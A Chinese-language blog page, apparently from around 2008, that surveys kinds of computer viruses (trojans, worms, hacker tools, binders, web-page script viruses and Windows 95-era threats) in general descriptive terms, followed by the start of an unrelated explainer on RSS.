  这种病毒将自身代码附着于正常程序的首部或尾部。该类病毒的种类繁多,大多 感染文件的病毒都是这种类型。
 
  病毒生成工具:
 
  通常是以菜单形式驱动,只要是具备一点计算机知识的人,利用病毒生成工具就 可以像点菜一样轻易地制造出计算机病毒,而且可以设计出非常复杂的具有偷盗和多形性特征的病毒。
 
 
 
 
 
 
 
 
 
新时代下的网络病毒
 
   传统的网络病毒定义是指利用网络进行传播的一类病毒的总称。而现在网络时代的网络病毒,已经不是如此单纯的一个概念了,它被溶进了更多的东西。可以这样说,如今的网络病毒是指以网络为平台,对计算机产生安全威胁的所有程序的总和。
由“骗子”升级为“间谍”——木马病毒(Trojan)

传统的木马病毒是指一些有正常程序外表的病毒程序,例如一些密码窃取病毒,它会伪装成系统登录框的模样,当用户在登录框中输入用户名与密码时,这个假的登录框木马便会将用户口令通过网络泄漏出去。
 
现在的木马病毒与传统的木马病毒相比已经有了很大的区别。如果说传统的木马病毒是个骗子的话,那么现在的木马病毒则更象一个间谍。现在的木马病毒一般是指,利用系统漏洞进入用户的计算机系统,通过修改注册表自启动,运行时有意不让用户察觉,将用户计算机中的所有信息都暴露在网络中的病毒程序。如今木马病毒更多地是扮演“里通外国”的角色。大多数黑客程序的服务器端都是木马病毒。
 
不断自我完善——蠕虫病毒(Worm)
 
蠕虫病毒是指利用网络缺陷进行繁殖的病毒程序,象当年的“莫里斯”病毒就是典型的蠕虫病毒。它利用网络的缺陷在网络中大量繁殖,导致几千台服务器无法正常提供服务。

如今的蠕虫病毒除了利用网络缺陷外,更多地利用了一些新的技术,比如说:“求职信”病毒,是利用邮件系统这一大众化的平台,将自己传遍千家万户;“密码”病毒,是利用人们的好奇心理,诱使用户来主动运行病毒;“尼姆达”病毒,则是综合了系统病毒的方法,利用感染文件来加速自己的传播。
 
一枝“新秀”——黑客程序(Hack)
 
黑客程序产生的年代由来以久,但在过去,从没有人将它看做是病毒,理由是,黑客程序只是一个工具,它有界面又不会传染,不能算做病毒。
而随着网络的发展与人们日益增长的安全需求,我们必须重新来看待黑客程序。黑客程序一般都有攻击性,它会利用漏洞在远程控制计算机,甚至直接破坏计算机;黑客程序通常会在用户的计算机中植入一个木马病毒,与木马病毒内外勾结,对计算机安全构成威胁。所以黑客程序也是一种网络病毒。象“冰河”病毒,“BO”病毒,它们功能强大到可以远端控制计算机做任何事情。
 
新型病毒——捆绑器病毒(Binder)
 
捆绑器病毒是一个很新的概念,人们编写这些程序的最初目的是希望通过一次点击可以同时运行多个程序,然而这一工具却成了病毒的新帮凶。比如说,用户可以将一个小游戏与病毒通过捆绑器程序捆绑,当用户运行游戏时,病毒也会同时悄悄地运行,给用户计算机造成危害。
由于捆绑器会将两个程序重新组合,产生一个自己的特殊格式,所以捆绑器程序的出现,使新变种病毒产生的速度大大增加了。为了对付新情况,各大杀毒厂商都将此类型程序定义成一种新病毒——捆绑器病毒,象瑞星2003版杀毒软件还针对此种病毒推出了新的杀毒引擎,可见此病毒已经得到了人们更多的观注。
 
新帮凶——网页病毒
 
网页病毒是利用网页来进行破坏的病毒,它存在于网页之中,其实是利用一些SCRIPT语言编写的一些恶意代码。当用户登录某些含有网页病毒的网站时,网页病毒便被悄悄激活,这些病毒一旦激活,可以利用系统的一些资源进行破坏。轻则修改用户的注册表,使用户的首页、浏览器标题改变,重则可以关闭系统的很多功能,使用户无法正常使用计算机系统,严重者则可以将用户的系统进行格式化。而这种网页病毒容易编写和修改,使用户防不胜防,最好的方法是选用有网页监控功能的杀毒软件以防万一。
 
在新型网络环境下,滋生了许多新概念病毒,针对这种状况,反病毒厂商在研制其产品中也作了很大了改进,如瑞星公司在近期推出的“瑞星杀毒软件2003版”中的“文件级、邮件级、内存级、网页级一体化实时监控系统”,可以全面、有效地监控各种类型的电脑病毒。
 
新时代下的电脑病毒越来越“智能”,此时除了需要反病毒技术不断提高外,还需广大计算机用户提高防范病毒意识。只有厂商和用户的共同努力,才可以有效地遏制病毒的破坏。
 
 
 
 
 
 
 
 
 
 
32位操作系统下的病毒
 
   计算机病毒已经给现代计算机应用带来了很大的威胁。当我们通过网络,磁盘来分享更多信息的同时,计算机病毒的蔓延速度也在不断增大。从传统上讲,DOS环境有大量的病毒,现在已经超过了5000种。然而, 近几年产生了许多以Windows平台为特定目标的计算机病毒将来我们会看到针对象Windows95这种32位操作系统的计算机病毒吗? 不幸的是答案是正确的。当Windows95引入的新技术给用户带来新的动力的时候,它也给计算机病毒更多的机会。例如Windows95没有文件等级保护,这意味着,当网络上的任一台计算机感染了病毒以后,在对等网络中共享的没有被保护的驱动器和文件,将被很快感染。另外,Windows95没有内置防病毒能力, 这样公司和个人用第三方反病毒解决方案来加固系统是十分重要的。
 
   1?在Windows95环境下的病毒?
   Windows95下可以运行DOS程序,Windows16位程序和Windows32位程序。为保持与先前Windows版本的兼容,Windows运行时十分象在DOS下的Windows3.1,首先启动实模式。在实模式中程序和设备驱动程序从CONFIG.SYS和AUTOEXEC.BAT中装载。之后是引导过程,启动Windows95的图形部件。当Windows完成启动后, 用户可以用打开DOS 对话框的方式运行DOS程序。DOS对话框中包括在系统初期启动时所有程序的拷贝,包括可能被装载的病毒代码。不幸的是,这意味着每次DOS对话框启动时将始终有相同的程序,它们是在Windows95图形部份启动前装载的(包括病毒)。并且多次DOS进程可以导致多次感染。?
   在早期版本的Windows中,DOS管理文件系统。而在Windows95中就不同了,Windows95通过使用设备驱动和32位程序来管理传统文件系统。Windows95要求确保文件系统的完整体。为了达到以上目的,禁止DOS程序(和传统病毒)对硬盘进行直接读写,除非它们用特殊的Windows专用代码。但是,在Windows95中允许 DOS程序和病毒对软盘进行直接读写。以上对病毒十分有利,对用户来说是十分不幸的;病毒仍然可以用相同的方式工作,象从硬盘中一样。并且Windows95很少能阻止它。当用户没有注意到用一张有病毒的软盘来引导时,病毒能感染MBR。 病毒将在每次计算机引导时装载,在每一次DOS对话框时安装到系统中。这样当用户对软盘进行操作时,病毒可以将自身繁殖到另外的软盘,从而蔓延到其它的计算机。
   另外,和DOS一样,Windows没有文件等级保护。利用文件进行传播的病毒仍然可以在Windows95下进行繁殖。这与其它的32位操作系统一样,例如OS/2,WindowsNT,它们也允许对文件进行写操作。这样,文件型病毒恰恰象它们在DOS环境下一样进行复制。
?
   2?新技术促进病毒的传播?
   一些使Windows95有吸引力的新技术,实际上帮助病毒在整个网络中繁殖。 例如工作组网络环境十分容易地使病毒快速传播。再有,由于Windows95没有文件等级保护,如果在网络中的计算机被病毒感染, 在对等网络中共享的没有被保护的驱动器和文件将很快被感染。
?
   3?潜在新病毒?
   在反病毒界,有关于新病毒的讨论,这些病毒有可能因Windows95的特性而产生。一个可能的病毒类型是OLE 2 (Object Linking and Embedded)病毒。这种类型的病毒通过将自己假扮成公共服务的一个 OLE2服务器来容易地进行传播。之后,当一个OLE2客户申请一个OLE2服务器来提供公共服务时,实际上病毒取得了控制权。
   它能将自己繁殖到其它文件和计算机,之后运行它替换了的原有OLE2服务器。这个应用程序甚至不知道自己是另一个病毒进行“通话”而不是实际上的OLE2服务器。如果这个OLE2服务器在一个完全不同网络计算机,这个病毒能很快地在网络上传播。?
   另外一种可能的病毒是扩展Shell病毒。Microsoft使这种Shell在Windows95中完全扩展来允许自定义。从技术上讲,病毒能成为其中的一个扩展,因为Windows95对于扩展Shell不需要确认,因此病毒可以写成一种扩展 Shell这样就可以取得控制权并且复制自身。?
   另外一种病毒可能会变得十分流行,它是虚拟设备驱动病毒VxD病毒(Virtual Device Driver)。 Windows95 VxD对整个计算机具有完全控制权。如果通过编制特定程序,它可以直接对硬盘进行写操作。它具有写Windows95 Kernel模块相同的特权,因此它具有广泛的自由来控制系统。在Windows95中增加了动态装载VxD能力, 这就是说一个VxD,不需要每次都在内存中,而是在系统需要时。这意味着病毒可以用一段很小的代码来激活一个动态VXD, 这可以导致严重的系统崩溃。因为Windows95对VxD的行为没有限制,因此VxD病毒可以绕过你所采用的任何保机制。?
   另外一种可能产生病毒的原因是Windows的易操作编程工具的流行。 过去,病毒的编制看需要了解大量的关于汇编和操作系统的知识来创建TSR程序来进行复制。对于Windows来说,许多新手可以用可视化开发工具的高级语言来编写病毒。因为它们更象用户运行的其它程序,因此很难检测出来。



Modified At 2008-05-21 19:12:09

RSS详解

(Really Simple Syndication)是一种描述和同步网站内容的格式,是目前使用最广泛的XML应用。

RSS是一种起源于网景的推技术,将订户订阅的内容传送给他们的通讯协同格式(Protocol)。RSS可以是以下三个解释的其中一个:
Really Simple Syndication
RDF (Resource Description Framework) Site Summary
Rich Site Summary
但其实这三个解释都是指同一种Syndication的技术。 RSS目前广泛用于网上新闻频道,blog和wiki,主要的版本有0.91, 1.0, 2.0。

Continue reading “RSS详解”